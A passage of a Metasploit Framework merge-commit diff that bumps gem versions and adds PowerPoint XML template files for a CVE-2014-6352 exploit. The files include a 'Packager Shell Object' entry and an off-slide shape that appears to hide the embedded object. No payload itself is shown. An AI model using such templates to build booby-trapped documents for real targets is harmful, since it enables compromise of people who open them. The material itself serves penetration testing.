Merge branch 'master' into feature/MSP-11605/lazy-thread-creation

MSP-11605

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.28.0)
-      meterpreter_bins (= 0.0.10)
+      meterpreter_bins (= 0.0.11)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -22,7 +22,7 @@ PATH
       tzinfo
     metasploit-framework-db (4.10.1.pre.dev)
       activerecord (< 4.0.0)
-      metasploit-credential (~> 0.13.0)
+      metasploit-credential (~> 0.13.3)
       metasploit-framework (= 4.10.1.pre.dev)
       metasploit_data_models (~> 0.21.1)
       pg (>= 0.11)
@@ -112,7 +112,7 @@ GEM
     metasploit-concern (0.3.0)
       activesupport (~> 3.0, >= 3.0.0)
       railties (< 4.0.0)
-    metasploit-credential (0.13.2)
+    metasploit-credential (0.13.3)
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.28.0)
       metasploit_data_models (~> 0.21.0)
@@ -132,7 +132,7 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.10)
+    meterpreter_bins (0.0.11)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.1)
@@ -212,7 +212,7 @@ GEM
       multi_json (~> 1.0)
       rack (~> 1.0)
       tilt (~> 1.1, != 1.3.0)
-    sqlite3 (1.3.9)
+    sqlite3 (1.3.10)
     thor (0.19.1)
     tilt (1.4.1)
     timecop (0.7.1)

data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/thumbnail" Target="docProps/thumbnail.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="ppt/presentation.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>37</TotalTime><Words>2</Words><Application>Microsoft Office PowerPoint</Application><PresentationFormat>On-screen Show (4:3)</PresentationFormat><Paragraphs>2</Paragraphs><Slides>1</Slides><Notes>0</Notes><HiddenSlides>0</HiddenSlides><MMClips>0</MMClips><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="6" baseType="variant"><vt:variant><vt:lpstr>Theme</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Embedded OLE Servers</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Slide Titles</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="3" baseType="lpstr"><vt:lpstr>Office Theme</vt:lpstr><vt:lpstr>Packager Shell Object</vt:lpstr><vt:lpstr>Example</vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>

data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title>Example</dc:title><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>9</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2014-08-06T07:56:10Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-12T06:36:10Z</dcterms:modified></cp:coreProperties>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/_rels/presentation.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml

@@ -0,0 +1,31 @@
+<xml xmlns:v="urn:schemas-microsoft-com:vml"
+ xmlns:o="urn:schemas-microsoft-com:office:office"
+ xmlns:p="urn:schemas-microsoft-com:office:powerpoint"
+ xmlns:oa="urn:schemas-microsoft-com:office:activation">
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75"
+  o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+  <v:stroke joinstyle="miter"/>
+  <v:formulas>
+   <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+   <v:f eqn="sum @0 1 0"/>
+   <v:f eqn="sum 0 0 @1"/>
+   <v:f eqn="prod @2 1 2"/>
+   <v:f eqn="prod @3 21600 pixelWidth"/>
+   <v:f eqn="prod @3 21600 pixelHeight"/>
+   <v:f eqn="sum @0 0 1"/>
+   <v:f eqn="prod @6 1 2"/>
+   <v:f eqn="prod @7 21600 pixelWidth"/>
+   <v:f eqn="sum @8 21600 0"/>
+   <v:f eqn="prod @7 21600 pixelHeight"/>
+   <v:f eqn="sum @10 21600 0"/>
+  </v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+  <o:lock v:ext="edit" aspectratio="t"/>
+ </v:shapetype><v:shape id="_x0000_s1034" type="#_x0000_t75" style='position:absolute;left:100pt;top:-100pt;width:30pt;height:30pt'>
+  <v:fill color="white" opacity="1" on="f" type="solid"/>
+  <v:stroke on="f"/>
+  <v:imagedata o:relid="rId1" o:title="" croptop="0" cropbottom="0" cropleft="0"
+   cropright="0" grayscale="f" bilevel="f"/>
+  <o:lock v:ext="edit" aspectratio="t" position="f" selection="f" grouping="f"/>
+ </v:shape></xml>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:presentationPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:extLst><p:ext uri="{E76CE94A-603C-4142-B9EB-6D1370010A27}"><p14:discardImageEditData xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="0"/></p:ext><p:ext uri="{D31A062A-798A-4329-ABDD-BBA856620510}"><p14:defaultImageDpi xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220"/></p:ext><p:ext uri="{FD5EFAAD-0ECE-453E-9831-46B23BE46B34}"><p15:chartTrackingRefBased xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="" val="0"/></p:ext></p:extLst></p:presentationPr>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml

@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" saveSubsetFonts="1"><p:sldMasterIdLst><p:sldMasterId id="2147483648" r:id="rId1"/></p:sldMasterIdLst><p:sldIdLst><p:sldId id="256" r:id="rId2"/></p:sldIdLst><p:sldSz cx="9144000" cy="6858000" type="screen4x3"/><p:notesSz cx="6858000" cy="9144000"/><p:defaultTextStyle><a:defPPr><a:defRPr lang="en-US"/></a:defPPr><a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl9pPr></p:defaultTextStyle><p:extLst><p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}"><p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="">
+                <p15:guide id="1" orient="horz" pos="2160">
+                    <p15:clr>
+                        <a:srgbClr val="A4A3A4"/>
+                    </p15:clr>
+                </p15:guide>
+                <p15:guide id="2" pos="2880">
+                    <p15:clr>
+                        <a:srgbClr val="A4A3A4"/>
+                    </p15:clr>
+                </p15:guide>
+            </p15:sldGuideLst></p:ext></p:extLst></p:presentation>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="title" preserve="1"><p:cSld name="Title Slide"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ctrTitle"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="685800" y="2130425"/><a:ext cx="7772400" cy="1470025"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Subtitle 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="subTitle" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1371600" y="3886200"/><a:ext cx="6400800" cy="1752600"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master subtitle style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTx" preserve="1"><p:cSld name="Title and Vertical Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks 